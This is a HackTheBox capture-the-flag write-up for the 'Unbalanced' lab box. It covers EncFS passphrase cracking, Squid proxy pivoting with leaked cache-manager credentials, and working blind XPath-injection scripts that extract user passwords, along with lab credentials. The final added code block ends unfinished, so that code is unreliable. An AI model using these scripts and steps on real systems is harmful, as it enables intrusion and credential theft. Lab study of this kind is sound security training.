HackTheBox Unbalanced Writeup – 10.10.10.200

Welcome back, folks. This writeup is about the HackTheBox Unbalanced machine (10.10.10.200), released last Saturday.

Initial Foothold and the User

The initial foothold came from rsync, found by the Nmap scan: the only module it exposes holds an EncFS-encrypted backup of configuration files. Cracking the EncFS passphrase with John gave access to those files, among them the squid.conf that handed me control of the Squid proxy (its cache manager password and the ACLs that let the proxy reach internal hosts). User was harder than root: an XPath injection in the intranet login page eventually leaked the credentials, and one of them worked for SSH. Deep enumeration is a must here.

The Root

The user Bryan has a TODO list that reveals an unfinished part of the setup he is working on. Further enumeration shows it is Pi-hole, the installed version (4.3.2) is vulnerable, a public exploit gives a reverse shell, and a configuration script inside the container reveals an administrator password that is reused for root.

Let me make one point first: this machine is *insane*.

OS: Linux
Difficulty: Hard
Points: 40
Release: 01 Aug 2020
IP: 10.10.10.200

Enumeration

As usual I added the machine IP to my hosts file as unbalanced.htb and started off with an Nmap scan. It shows ports 22, 873 and 3128 open. Neither 80 nor 8080 is open, which already hints that any web content will have to be reached through the proxy on 3128.

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 a2:76:5c:b0:88:6f:9e:62:e8:83:51:e7:cf:bf:2d:f2 (RSA)
|   256 d0:65:fb:f6:3e:11:b1:d6:e6:f7:5e:c0:15:0c:0a:77 (ECDSA)
|_  256 5e:2b:93:59:1d:49:28:8d:43:2c:c1:f7:e3:37:0f:83 (ED25519)
873/tcp  open  rsync      (protocol version 31)
3128/tcp open  http-proxy Squid http proxy 4.6
|_http-server-header: squid/4.6
|_http-title: ERROR: The requested URL could not be retrieved
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

RSync

With the rsync port open, I listed the modules the daemon exposes:

root@nav1n:~/htb/unbalanced # rsync -a rsync://unbalanced.htb:873
conf_backups   	EncFS-encrypted configuration backups
root@nav1n:~/htb/unbalanced # 

Let's download the module and analyze it.

root@nav1n:~/htb/unbalanced # rsync -av rsync://unbalanced.htb/conf_backups conf_backups
receiving incremental file list
created directory conf_backups
./
,CBjPJW4EGlcqwZW4nmVqBA6
-FjZ6-6,Fa,tMvlDsuVAO7ek
.encfs6.xml
0K72OfkNRRx3-f0Y6eQKwnjn
27FonaNT2gnNc3voXuKWgEFP4sE9mxg0OZ96NB0x4OcLo-
2VyeljxHWrDX37La6FhUGIJS
3E2fC7coj5,XQ8LbNXVX9hNFhsqCjD-g3b-7Pb5VJHx3C1
3cdBkrRF7R5bYe1ZJ0KYy786
3xB4vSQH-HKVcOMQIs02Qb9,
4J8k09nLNFsb7S-JXkxQffpbCKeKFNJLk6NRQmI11FazC1
5-6yZKVDjG4n-AMPD65LOpz6-kz,ae0p2VOWzCokOwxbt,
5FTRnQDoLdRfOEPkrhM2L29P
5IUA28wOw0wwBs8rP5xjkFSs
6R1rXixtFRQ5c9ScY8MBQ1Rg
7-dPsi7efZRoXkZ5oz1AxVd-Q,L05rofx0Mx8N2dQyUNA,
7zivDbWdbySIQARaHlm3NbC-7dUYF-rpYHSQqLNuHTVVN1
8CBL-MBKTDMgB6AT2nfWfq-e
8XDA,IOhFFlhh120yl54Q0da
8e6TAzw0xs2LVxgohuXHhWjM
9F9Y,UITgMo5zsWaP1TwmOm8EvDCWwUZurrL0TwjR,Gxl0
A4qOD1nvqe9JgKnslwk1sUzO
Acv0PEQX8vs-KdK307QNHaiF
B6J5M3OP0X7W25ITnaZX753T
Chlsy5ahvpl5Q0o3hMyUIlNwJbiNG99DxXJeR5vXXFgHC1
ECXONXBBRwhb5tYOIcjjFZzh
F4F9opY2nhVVnRgiQ,OUs-Y0
FGZsMmjhKz7CJ2r-OjxkdOfKdEip4Gx2vCDI24GXSF5eB1
FSXWRSwW6vOvJ0ExPK0fXJ6F
IymL3QugM,XxLuKEdwJJOOpi
KPYfvxIoOlrRjTY18zi8Wne-
Kb-,NDTgYevHOGdHCYsSQhhIHrUGjiM6i2JZcl,-PKAJm0
Kpo3MHQxksW2uYX79XngQu-f
KtFc,DR7HqmGdPOkM2CpLaM9
Mv5TtpmUNnVl-fgqQeYAy8uu
MxgjShAeN6AmkH2tQAsfaj6C
Ni8LDatT134DF6hhQf5ESpo5
Nlne5rpWkOxkPNC15SEeJ8g,
OFG2vAoaW3Tvv1X2J5fy4UV8
OvBqims-kvgGyJJqZ59IbGfy
StlxkG05UY9zWNHBhXxukuP9
TZGfSHeAM42o9TgjGUdOSdrd
VQjGnKU1puKhF6pQG1aah6rc
W5,ILrUB4dBVW-Jby5AUcGsz
Wr0grx0GnkLFl8qT3L0CyTE6
X93-uArUSTL,kiJpOeovWTaP
Ya30M5le2NKbF6rD-qD3M-7t
Yw0UEJYKN,Hjf-QGqo3WObHy
Z8,hYzUjW0GnBk1JP,8ghCsC
ZXUUpn9SCTerl0dinZQYwxrx
ZvkMNEBKPRpOHbGoefPa737T
a4zdmLrBYDC24s9Z59y-Pwa2
c9w3APbCYWfWLsq7NFOdjQpA
cwJnkiUiyfhynK2CvJT7rbUrS3AEJipP7zhItWiLcRVSA1
dF2GU58wFl3x5R7aDE6QEnDj
dNTEvgsjgG6lKBr8ev8Dw,p7
gK5Z2BBMSh9iFyCFfIthbkQ6
gRhKiGIEm4SvYkTCLlOQPeh-
hqZXaSCJi-Jso02DJlwCtYoz
iaDKfUAHJmdqTDVZsmCIS,Bn
jIY9q65HMBxJqUW48LJIc,Fj
kdJ5whfqyrkk6avAhlX-x0kh
kheep9TIpbbdwNSfmNU1QNk-
l,LY6YoFepcaLg67YoILNGg0
lWiv4yDEUfliy,Znm17Al41zi0BbMtCbN8wK4gHc333mt,
mMGincizgMjpsBjkhWq-Oy0D
oPu0EVyHA6,KmoI1T,LTs83x
pfTT,nZnCUFzyPPOeX9NwQVo
pn6YPUx69xqxRXKqg5B5D2ON
q5RFgoRK2Ttl3U5W8fjtyriX
qeHNkZencKDjkr3R746ZzO5K
sNiR-scp-DZrXHg4coa9KBmZ
sfT89u8dsEY4n99lNsUFOwki
uEtPZwC2tjaQELJmnNRTCLYU
vCsXjR1qQmPO5g3P3kiFyO84
waEzfb8hYE47wHeslfs1MvYdVxqTtQ8XGshJssXMmvOsZLhtJWWRX31cBfhdVygrCV5

sent 1,452 bytes  received 411,990 bytes  33,075.36 bytes/sec
total size is 405,603  speedup is 0.98
root@nav1n:~/htb/unbalanced # 

The module description already said EncFS, and the download confirms it: the file names are EncFS-encoded (the nameio/block scheme), and there is a .encfs6.xml volume configuration with the following content.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE boost_serialization>
<boost_serialization signature="serialization::archive" version="7">
    <cfg class_id="0" tracking_level="0" version="20">
        <version>20100713</version>
        <creator>EncFS 1.9.5</creator>
        <cipherAlg class_id="1" tracking_level="0" version="0">
            <name>ssl/aes</name>
            <major>3</major>
            <minor>0</minor>
        </cipherAlg>
        <nameAlg>
            <name>nameio/block</name>
            <major>4</major>
            <minor>0</minor>
        </nameAlg>
        <keySize>192</keySize>
        <blockSize>1024</blockSize>
        <plainData>0</plainData>
        <uniqueIV>1</uniqueIV>
        <chainedNameIV>1</chainedNameIV>
        <externalIVChaining>0</externalIVChaining>
        <blockMACBytes>0</blockMACBytes>
        <blockMACRandBytes>0</blockMACRandBytes>
        <allowHoles>1</allowHoles>
        <encodedKeySize>44</encodedKeySize>
        <encodedKeyData>
GypYDeps2hrt2W0LcvQ94TKyOfUcIkhSAw3+iJLaLK0yntwAaBWj6EuIet0=
</encodedKeyData>
        <saltLen>20</saltLen>
        <saltData>
mRdqbk2WwLMrrZ1P6z2OQlFl8QU=
</saltData>
        <kdfIterations>580280</kdfIterations>
        <desiredKDFDuration>500</desiredKDFDuration>
    </cfg>
</boost_serialization>

The XML file holds the volume metadata: the cipher (AES with a 192-bit key), the PBKDF2 salt, the iteration count (580280) and, in encodedKeyData, the volume key wrapped with the key derived from the passphrase. That wrapped key is what a cracker needs, since it can test a guess by deriving the key and checking whether the blob unwraps. John the Ripper's jumbo build ships encfs2john.py for exactly this: it turns .encfs6.xml into a hash line. Running it against the conf_backups directory gave:

root@nav1n:~/htb/unbalanced # python encfs2john.py conf_backups/ > unbalanced.hash     
root@nav1n:~/htb/unbalanced # cat unbalanced.hash 
conf_backups/:$encfs$192*580280*0*20*99176a6e4d96c0b32bad9d4feb3d8e425165f105*44*1b2a580dea6cda1aedd96d0b72f43de132b239f51c224852030dfe8892da2cad329edc006815a3e84b887add
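As an added illustration, not part of the original post and not John's own code, the following Python does what encfs2john.py does to the .encfs6.xml above: it decodes the base64 salt and wrapped volume key and joins them with the KDF parameters into the $encfs$ line. The field order is the one visible in the hash above; the cipher numbering (ssl/aes = 0, ssl/blowfish = 1) is an assumption about the cracker's convention, and the XML constant is the file from this box trimmed to the fields used.

```python
import base64
import xml.etree.ElementTree as ET

# Cipher ids as used in John's $encfs$ format: 0 = ssl/aes (confirmed by the hash
# on this page), 1 = ssl/blowfish (assumed; not verified here).
CIPHER_IDS = {"ssl/aes": 0, "ssl/blowfish": 1}

# The .encfs6.xml pulled from the conf_backups rsync module, trimmed to the fields used.
ENCFS6_XML = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE boost_serialization>
<boost_serialization signature="serialization::archive" version="7">
    <cfg class_id="0" tracking_level="0" version="20">
        <version>20100713</version>
        <creator>EncFS 1.9.5</creator>
        <cipherAlg class_id="1" tracking_level="0" version="0">
            <name>ssl/aes</name>
            <major>3</major>
            <minor>0</minor>
        </cipherAlg>
        <keySize>192</keySize>
        <blockSize>1024</blockSize>
        <encodedKeySize>44</encodedKeySize>
        <encodedKeyData>
GypYDeps2hrt2W0LcvQ94TKyOfUcIkhSAw3+iJLaLK0yntwAaBWj6EuIet0=
</encodedKeyData>
        <saltLen>20</saltLen>
        <saltData>
mRdqbk2WwLMrrZ1P6z2OQlFl8QU=
</saltData>
        <kdfIterations>580280</kdfIterations>
        <desiredKDFDuration>500</desiredKDFDuration>
    </cfg>
</boost_serialization>
"""


def encfs_config_to_john(xml_text, label):
    """Build the line encfs2john.py emits for a volume:
    label:$encfs$keySize*kdfIterations*cipher*saltLen*salt_hex*encodedKeySize*key_hex
    encodedKeyData is the volume key wrapped with the passphrase-derived key; a
    cracker derives a key from each guess (PBKDF2-SHA1, kdfIterations rounds over
    saltData) and checks whether that key unwraps the blob."""
    cfg = ET.fromstring(xml_text).find("cfg")
    cipher = cfg.findtext("cipherAlg/name").strip()
    if cipher not in CIPHER_IDS:
        raise ValueError("unsupported cipher %r" % cipher)
    salt = base64.b64decode(cfg.findtext("saltData").strip())
    key = base64.b64decode(cfg.findtext("encodedKeyData").strip())
    # The declared lengths must agree with the decoded data; an edited or truncated
    # config would produce a hash John cannot use.
    if len(salt) != int(cfg.findtext("saltLen")) or len(key) != int(cfg.findtext("encodedKeySize")):
        raise ValueError("saltLen/encodedKeySize do not match the decoded data")
    return "%s:$encfs$%s*%s*%d*%d*%s*%d*%s" % (
        label,
        cfg.findtext("keySize").strip(),
        cfg.findtext("kdfIterations").strip(),
        CIPHER_IDS[cipher],
        len(salt), salt.hex(),
        len(key), key.hex(),
    )


if __name__ == "__main__":
    print(encfs_config_to_john(ENCFS6_XML, "conf_backups/"))
```

The 580280 in the kdfIterations field is why John reports only about 16 guesses per second below: every candidate passphrase costs a full PBKDF2-SHA1 run before the wrapped key can be test-unwrapped, so this attack lives or dies on the passphrase being in a wordlist.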

With the hash, I ran it through John with rockyou as the wordlist. The cost line in the output is worth a look: 580280 PBKDF2 iterations means John only manages about 16 guesses per second here, so this only works because the passphrase is weak. John cracked it: bubblegum

root@nav1n:~/htb/unbalanced # john --wordlist=/usr/share/wordlists/rockyou.txt unbalanced.hash
Using default input encoding: UTF-8
Loaded 1 password hash (EncFS [PBKDF2-SHA1 256/256 AVX2 8x AES])
Cost 1 (iteration count) is 580280 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bubblegum        (conf_backups/)
1g 0:00:00:43 DONE (2020-08-03 18:52) 0.02282g/s 16.43p/s 16.43c/s 16.43C/s bambam..marissa
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@nav1n:~/htb/unbalanced # 

Decrypting The Directory

To decrypt the directory I need EncFS installed locally. Its GitHub repo has detailed documentation; after installing it and reading a couple of blog posts on how EncFS works and how an encrypted directory is mounted with its passphrase, I was ready.

With the passphrase in hand, I mounted the encrypted directory onto a new mount point, conf_backups_decryped, where the files appear in clear. It contains a lot of *.conf files.

root@nav1n:~/htb/unbalanced # mkdir conf_backups_decryped
root@nav1n:~/htb/unbalanced # encfs "$PWD/conf_backups" "$PWD/conf_backups_decryped"
EncFS Password: 
root@nav1n:~/htb/unbalanced # cd conf_backups_decryped 
root@nav1n:~/htb/unbalanced/conf_backups_decryped # ls -la
total 628
drwxr-xr-x 2 root root   4096 Apr  4 18:05 .
drwxr-xr-x 7 root root   4096 Aug  3 19:11 ..
-rw-r--r-- 1 root root    267 Apr  4 18:05 50-localauthority.conf
-rw-r--r-- 1 root root    455 Apr  4 18:05 50-nullbackend.conf
-rw-r--r-- 1 root root     48 Apr  4 18:05 51-debian-sudo.conf
-rw-r--r-- 1 root root    182 Apr  4 18:05 70debconf
-rw-r--r-- 1 root root   2351 Apr  4 18:05 99-sysctl.conf
-rw-r--r-- 1 root root   4564 Apr  4 18:05 access.conf
-rw-r--r-- 1 root root   2981 Apr  4 18:05 adduser.conf
-rw-r--r-- 1 root root   1456 Apr  4 18:05 bluetooth.conf
======snip========

Going through the list of files, squid.conf caught my attention, because Squid is what is running on port 3128 of the box.

The configuration file contains the following:

The ACL (Access control lists)

acl localnet src 0.0.0.1-0.255.255.255	# RFC 1122 "this" network (LAN)
acl localnet src 10.0.0.0/8		# RFC 1918 local private network (LAN)
acl localnet src 100.64.0.0/10		# RFC 6598 shared address space (CGN)
acl localnet src 169.254.0.0/16 	# RFC 3927 link-local (directly plugged) machines
acl localnet src 172.16.0.0/12		# RFC 1918 local private network (LAN)
acl localnet src 192.168.0.0/16		# RFC 1918 local private network (LAN)
acl localnet src fc00::/7       	# RFC 4193 local private network range
acl localnet src fe80::/10      	# RFC 4291 link-local (directly plugged) machines

acl SSL_ports port 443
acl Safe_ports port 80		# http
acl Safe_ports port 21		# ftp
acl Safe_ports port 443		# https
acl Safe_ports port 70		# gopher
acl Safe_ports port 210		# wais
acl Safe_ports port 1025-65535	# unregistered ports
acl Safe_ports port 280		# http-mgmt
acl Safe_ports port 488		# gss-http
acl Safe_ports port 591		# filemaker
acl Safe_ports port 777		# multiling http
acl CONNECT method CONNECT

A New Subdomain

The config also names a new virtual host, intranet.unbalanced.htb, and allows proxying both to it and to the whole 172.16.0.0/12 range:

# Allow access to intranet
acl intranet dstdomain -n intranet.unbalanced.htb
acl intranet_net dst -n 172.16.0.0/12
http_access allow intranet
http_access allow intranet_net

# And finally deny all other access to this proxy
http_access deny all
#http_access allow all

Cache Manager Credentials

cachemgr_passwd Thah$Sh1 menu pconn mem diskd fqdncache filedescriptors objects vm_objects counters 5min 60min histograms cbdata sbuf events
cachemgr_passwd disable all

The Squid Proxy

The intranet.unbalanced.htb vhost is not reachable directly (there is no port 80 on the box); it sits behind the Squid proxy on 3128, and the config allows proxying to it. I installed Squid locally first, to experiment with the configuration.

(screenshot: Squid installed, enabled and running)

Then I pointed Firefox at 10.10.10.200:3128 as its HTTP proxy:

(screenshot: Firefox proxy settings)

Then I browsed http://intranet.unbalanced.htb, but it didn't work: I got an "unable to load" error, and trying different proxy settings didn't help. After a few minutes of trial and error I replaced my local squid.conf with the one from the decrypted backup, restarted the squid service, and the page loaded. The check that matters is that the request reaches the target's Squid with intranet.unbalanced.htb as the destination host (what curl does with its -x proxy option): it is the target's proxy, not the browser, that resolves that name, and the fqdncache output further down shows it maps to 172.17.0.1.

(screenshot: the employee login page at http://intranet.unbalanced.htb)

GoBuster to Discover Files

As the login page gave me nothing directly, I ran GoBuster through the proxy to find files and directories hidden from direct access. After a while it found the following:

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://intranet.unbalanced.htb
[+] Threads:        100
[+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] Proxy:          http://10.10.10.200:3128
[+] User Agent:     gobuster/3.0.1
[+] Show length:    true
[+] Extensions:     html,log,php,xml,cgi,htm
[+] Timeout:        10s
===============================================================
2020/08/03 20:12:22 Starting gobuster
===============================================================
/css (Status: 301) [Size: 194]
[ERROR] 2020/08/03 20:13:02 [!] Get http://intranet.unbalanced.htb/control.php: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/08/03 20:13:02 [!] Get http://intranet.unbalanced.htb/corba.cgi: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/employees.xml (Status: 403) [Size: 178]
/index.php (Status: 302) [Size: 0]
/index.php (Status: 302) [Size: 0]
/intranet.php (Status: 200) [Size: 6736]
[ERROR] 2020/08/03 20:13:56 [!] Get http://intranet.unbalanced.htb/registered.cgi: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/08/03 20:13:56 [!] Get http://intranet.unbalanced.htb/rcs.htm: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/employees.xml - 403
/index.php - 302
/intranet.php - 200

Except for intranet.php, the two other files were not accessible, so I needed another way forward. I recalled the cache manager password from the decrypted squid.conf. Looking up the Squid cache manager, I found an article that reaches the manager interface at the following URL on the proxy port (the doc's example host stands in for the target):

http://mycache.example.com:3128/squid-internal-mgr/info

With 10.10.10.200 in place of the example host I got access denied: the manager interface is there and protected, and I already have its password, so there is still something to work with.

Finding different Hosts and Subnets in the network.

The ACLs I found earlier tell me there are other subnets behind the proxy. The localnet lines below only describe where clients may come from, and no http_access rule in this config even references them; the line that matters for pivoting is acl intranet_net dst -n 172.16.0.0/12 together with http_access allow intranet_net, which lets anyone who can reach port 3128 use the proxy to talk to any host in 172.16.0.0/12:

acl localnet src 100.64.0.0/10		# RFC 6598 shared address space (CGN)
acl localnet src 169.254.0.0/16 	# RFC 3927 link-local (directly plugged) machines
acl localnet src 172.16.0.0/12		# RFC 1918 local private network (LAN)
acl localnet src 192.168.0.0/16		# RFC 1918 local private network (LAN)
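To see concretely why the proxy forwards to internal addresses it has never been asked about before, here is a small model of Squid's http_access evaluation, added as an example (it is neither the post's code nor Squid's). It handles only src, dst and dstdomain ACLs and ignores ports, methods and authentication; Squid resolves the request host to an IP itself, whereas this model is handed the IP. The config text is the access-control part of the squid.conf from the backup.

```python
import ipaddress

# The access-control part of the squid.conf recovered from the EncFS backup
# (copied from the page; unrelated directives left out).
SQUID_CONF = """
acl localnet src 0.0.0.1-0.255.255.255	# RFC 1122 "this" network (LAN)
acl localnet src 10.0.0.0/8		# RFC 1918 local private network (LAN)
acl localnet src 172.16.0.0/12		# RFC 1918 local private network (LAN)
acl localnet src 192.168.0.0/16		# RFC 1918 local private network (LAN)
acl SSL_ports port 443
acl Safe_ports port 80		# http
acl CONNECT method CONNECT
# Allow access to intranet
acl intranet dstdomain -n intranet.unbalanced.htb
acl intranet_net dst -n 172.16.0.0/12
http_access allow intranet
http_access allow intranet_net
# And finally deny all other access to this proxy
http_access deny all
#http_access allow all
"""


def parse_squid_access(conf):
    """Collect acl definitions (name -> (type, values)) and http_access rules in
    file order. Comments are stripped; the -n flag (no reverse lookup) is dropped."""
    acls, rules = {}, []
    for raw in conf.splitlines():
        f = raw.split("#", 1)[0].split()
        if len(f) >= 4 and f[0] == "acl":
            acls.setdefault(f[1], (f[2], []))[1].extend(a for a in f[3:] if a != "-n")
        elif len(f) >= 3 and f[0] == "http_access":
            rules.append((f[1], f[2:]))
    return acls, rules


def _addr_in(addr, spec):
    """spec is a CIDR, a bare address or a 'low-high' range, as Squid accepts for src/dst."""
    addr = ipaddress.ip_address(addr)
    if "-" in spec:
        lo, hi = (ipaddress.ip_address(x) for x in spec.split("-", 1))
        return addr.version == lo.version and lo <= addr <= hi
    net = ipaddress.ip_network(spec, strict=False)
    return addr.version == net.version and addr in net


def _acl_matches(acl, src, dst_host, dst_ip):
    kind, values = acl
    if kind == "src":
        return any(_addr_in(src, v) for v in values)
    if kind == "dst":  # Squid resolves the request host itself; here the caller supplies the IP
        return dst_ip is not None and any(_addr_in(dst_ip, v) for v in values)
    if kind == "dstdomain":  # a leading dot matches the domain and its subdomains
        return dst_host is not None and any(
            dst_host == v or (v.startswith(".") and dst_host.endswith(v)) for v in values)
    return False  # port, method, proxy_auth and other ACL types are not modelled


def http_access_decision(conf, src, dst_host, dst_ip):
    """First-match evaluation of http_access as Squid does it: a rule applies when
    every ACL named on it matches. If no rule matches, the default is the opposite
    of the last rule's action (deny when there are no rules at all)."""
    acls, rules = parse_squid_access(conf)
    acls.setdefault("all", ("src", ["0.0.0.0/0", "::/0"]))  # Squid's built-in 'all'
    for action, names in rules:
        if all(n in acls and _acl_matches(acls[n], src, dst_host, dst_ip) for n in names):
            return action
    if not rules:
        return "deny"
    return "deny" if rules[-1][0] == "allow" else "allow"


if __name__ == "__main__":
    for host, ip in [("intranet.unbalanced.htb", "172.17.0.1"),
                     ("172.31.179.1", "172.31.179.1"),
                     ("www.example.com", "93.184.216.34")]:
        print(host, ip, http_access_decision(SQUID_CONF, "10.10.14.22", host, ip))
```

With the rules in this order, a client from anywhere that can reach 3128 is allowed to any address in 172.16.0.0/12, which is what makes the internal hosts reachable from outside. The last check in the test also shows the classic Squid foot-gun: an unmatched request gets the opposite of the last rule, so a config that ends in a deny for one specific ACL silently allows everything else.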

Referring to that article again, I set out to find hosts within those ranges, starting with the 172.16.0.0/12 space the config names.

squidclient Command:

squidclient is the command-line client shipped with Squid; I installed it locally to query the cache manager from my machine, and since I already have the manager password, gathering information is easy.

root@nav1n:~/htb/unbalanced # squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:menu     
HTTP/1.1 200 OK
Server: squid/4.6
Mime-Version: 1.0
---snip----
Via: 1.1 unbalanced (squid/4.6)
Connection: close

 index                 	Cache Manager Interface         	disabled
 menu                  	Cache Manager Menu              	protected
 offline_toggle        	Toggle offline_mode setting     	disabled
 shutdown              	Shut Down the Squid Process     	disabled
 reconfigure           	Reconfigure Squid               	disabled
 rotate                	Rotate Squid Logs               	disabled
 pconn                 	Persistent Connection Utilization Histograms	protected
 mem                   	Memory Utilization              	protected
 diskd                 	DISKD Stats                     	protected
 squidaio_counts       	Async IO Function Counters      	disabled
 config                	Current Squid Configuration     	disabled
 client_list           	Cache Client List               	disabled
 comm_epoll_incoming   	comm_incoming() stats           	disabled
 ipcache               	IP Cache Stats and Contents     	disabled
 fqdncache             	FQDN Cache Stats and Contents   	protected
 idns                  	Internal DNS Statistics         	disabled
 redirector            	URL Redirector Stats            	disabled
 store_id              	StoreId helper Stats            	disabled
 external_acl          	External ACL stats              	disabled
 http_headers          	HTTP Header Statistics          	disabled
 info                  	General Runtime Information     	disabled
 service_times         	Service Times (Percentiles)     	disabled
 filedescriptors       	Process Filedescriptor Allocation	protected
 objects               	All Cache Objects               	protected
 vm_objects            	In-Memory and In-Transit Objects	protected
 io                    	Server-side network read() size histograms	disabled
 counters              	Traffic and Resource Counters   	protected
 peer_select           	Peer Selection Algorithms       	disabled
 digest_stats          	Cache Digest and ICP blob       	disabled
 5min                  	5 Minute Average of Counters    	protected
 60min                 	60 Minute Average of Counters   	protected
 utilization           	Cache Utilization               	disabled
 histograms            	Full Histogram Counts           	protected
 active_requests       	Client-side Active Requests     	disabled
 username_cache        	Active Cached Usernames         	disabled
 openfd_objects        	Objects with Swapout files open 	disabled
 store_digest          	Store Digest                    	disabled
 store_log_tags        	Histogram of store.log tags     	disabled
 storedir              	Store Directory Stats           	disabled
 store_io              	Store IO Interface Stats        	disabled
 store_check_cachable_stats	storeCheckCachable() Stats      	disabled
 refresh               	Refresh Algorithm Statistics    	disabled
 delay                 	Delay Pool Levels               	disabled
 forward               	Request Forwarding Statistics   	disabled
 cbdata                	Callback Data Registry Contents 	protected
 sbuf                  	String-Buffer statistics        	protected
 events                	Event Queue                     	protected
 netdb                 	Network Measurement Database    	disabled
 asndb                 	AS Number Database              	disabled
 carp                  	CARP information                	disabled
 userhash              	peer userhash information       	disabled
 sourcehash            	peer sourcehash information     	disabled
 server_list           	Peer Cache Statistics           	disabled
root@nav1n:~/htb/unbalanced # 

Going through the menu entries, fqdncache stood out: it is Squid's cache of resolved host names, which amounts to a list of the internal hosts the proxy has talked to. Here is the result:

root@nav1n:~/htb/unbalanced # squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:fqdncache
---snip----

FQDN Cache Statistics:
FQDNcache Entries In Use: 11
FQDNcache Entries Cached: 9
FQDNcache Requests: 11573
FQDNcache Hits: 0
FQDNcache Negative Hits: 5333
FQDNcache Misses: 6240
FQDN Cache Contents:

Address                                       Flg TTL Cnt Hostnames
127.0.1.1                                       H -001   2 unbalanced.htb unbalanced
::1                                             H -001   3 localhost ip6-localhost ip6-loopback
172.31.179.2                                    H -001   1 intranet-host2.unbalanced.htb
172.31.179.3                                    H -001   1 intranet-host3.unbalanced.htb
10.10.14.172                                   N  -10704   0
127.0.0.1                                       H -001   1 localhost
172.17.0.1                                      H -001   1 intranet.unbalanced.htb
ff02::1                                         H -001   1 ip6-allnodes
ff02::2                                         H -001   1 ip6-allrouters

So I have two new hosts: intranet-host2.unbalanced.htb at 172.31.179.2 and intranet-host3.unbalanced.htb at 172.31.179.3. The host names did not work through the proxy, but the sites loaded by IP. Both are either a replica of the employee login page or redirect to the intranet portal I found earlier, http://intranet.unbalanced.htb.

Since .2 and .3 exist, I also loaded 172.31.179.1, the one address in that range that appears in none of the cached names, and was greeted with an error page.

But with intranet.php added to the URL, I got the same kind of login page again.

Testing the Login Vulnerability

As I normally do with login pages, I tried the classic tautology ' or ''=' and, luckily, this page was vulnerable: instead of a login failure it listed the users with their e-mail addresses.

So the vulnerable login page reveals 4 users with their email ids:

  • Rita – rita@unbalanced.htb | HR Manager
  • Jim – jim@unbalanced.htb | Web Designer
  • Bryan – bryan@unbalanced.htb | System Administrator
  • Sarah – sarah@unbalanced.htb | Team Leader

The tautology works against XPath as well as SQL, and the employees.xml file GoBuster found (403, but present) suggests the user store is an XML document queried with XPath. So I treated it as XPath injection and brute-forced the passwords blind: the response differs when the injected condition is true, so each request tests one character of one position with substring().

The Script:

import requests

url = 'http://172.31.179.1/intranet.php'
proxy_url = 'http://10.10.10.200:3128'
w = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~!@#$%^&*(){}:"<>?'
u = ['rita', 'jim', 'bryan', 'sarah']

for user in u:
    # Baseline response: XPath substring() is 1-based, so position 0 never
    # matches and this request returns the "no match" page length.
    data = {'Username': '', 'Password': "' or Username='" + user + "' and substring(Password,0,1)='x"}
    request = requests.post(url, data=data, proxies={'http': proxy_url})
    b = len(request.text)
    cracked_pass = ''
    for i in range(1, 80):
        found = False
        for c in w:
            # The application's own query supplies the closing quote after c.
            data = {'Username': '', 'Password': "' or Username='" + user + "' and substring(Password," + str(i) + ",1)='" + c}
            request = requests.post(url, data=data, proxies={'http': proxy_url})
            if len(request.text) != b:   # a different page means the guess was right
                found = True
                break
        if not found:                    # nothing matched: end of the password
            break
        cracked_pass += c
    print(user + ':' + cracked_pass)

I found the passwords of all 4 users.

root@nav1n:~/htb/unbalanced # python crack.py
rita:password01!
jim:stairwaytoheaven
bryan:ireallyl0vebubblegum!!!
sarah:sarah4evah'
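Here is the same boolean-based blind extraction written out more carefully, as an added example rather than the script used on the box: it first asks for the password length with string-length(), then walks the positions with substring() (1-based in XPath) and reports characters it cannot test as '?'. It is built around an oracle function so it can run offline against a constructed stand-in for the vulnerable login (fake_oracle, which only understands the two predicate shapes the extractor emits); http_oracle shows the wiring for the live page through the Squid proxy. The user store below is made up apart from bryan's password.

```python
import re

# Characters to try per position. A single quote cannot be compared inside a
# '...'-quoted XPath literal, so it is left out; a position that matches nothing
# is reported as '?'.
CHARSET = ('0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
           '~!@#$%^&*(){}:"<>?')


def injected_password(user, condition):
    """Value for the Password field. The application's query supplies the final
    closing quote, so the payload ends with an open literal: ''='  +  '  ->  ''=''."""
    return "' or Username='%s' and %s and ''='" % (user, condition)


def extract_password(user, oracle, max_len=64):
    """Boolean-based blind extraction. oracle(payload) returns True when the injected
    condition holds (for the live target: the response differs from a known-false
    baseline). Length first, then one request per candidate character per position."""
    length = next((n for n in range(1, max_len + 1)
                   if oracle(injected_password(user, "string-length(Password)=%d" % n))), None)
    if length is None:
        raise ValueError("no password length up to %d found for %s" % (max_len, user))
    out = ""
    for pos in range(1, length + 1):          # XPath substring() positions are 1-based
        for c in CHARSET:
            if oracle(injected_password(user, "substring(Password,%d,1)='%s'" % (pos, c))):
                out += c
                break
        else:
            out += "?"                        # character outside CHARSET
    return out


def http_oracle(url, proxy):
    """Oracle against the real intranet page through the Squid proxy. requests is
    imported here so the rest of the file runs offline without it."""
    import requests
    session = requests.Session()

    def response_length(payload):
        r = session.post(url, data={"Username": "", "Password": payload},
                         proxies={"http": proxy}, timeout=10)
        return len(r.text)

    false_len = response_length(injected_password("", "1=0"))  # known-false baseline
    return lambda payload: response_length(payload) != false_len


def fake_oracle(users):
    """Constructed stand-in for the vulnerable login so the extractor can be run
    offline. It recognises only the two predicate shapes the extractor emits and
    applies XPath 1.0 semantics to them; it is not an XPath engine."""
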